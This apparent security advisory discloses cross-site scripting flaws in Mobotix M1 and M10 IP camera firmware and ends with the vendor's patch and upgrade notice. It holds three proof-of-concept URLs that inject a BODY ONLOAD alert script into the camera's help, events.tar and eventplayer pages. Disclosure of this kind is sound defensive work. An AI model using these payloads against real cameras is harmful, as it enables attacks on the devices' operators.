Posts tagged ‘mobotix’

Mobotix IP Network Cameras Multiple XSS

Version: Mobotix IP Network Cameras Multiple Cross Site Scripting
Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: Mobotix cameras are vulnerable to multiple cross site scripting flaws. Due to improper filtering of request parameters, a remote attacker can cause cross site scripting in these scripts:

http://camera/help/help?%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

Vendor: MOBOTIX provides new software versions that include a security patch
that prevents cross site scripting flaws.

MOBOTIX encourages customers to upgrade to at least software version
- V2.2.3.18 (for camera models M10/D10) and
- V3.0.3.31 (for camera model M22)
or higher (if available). The software is available for download from
our website www.mobotix.com:
http://www.mobotix.com/services/software_downloads

keywords: advisory001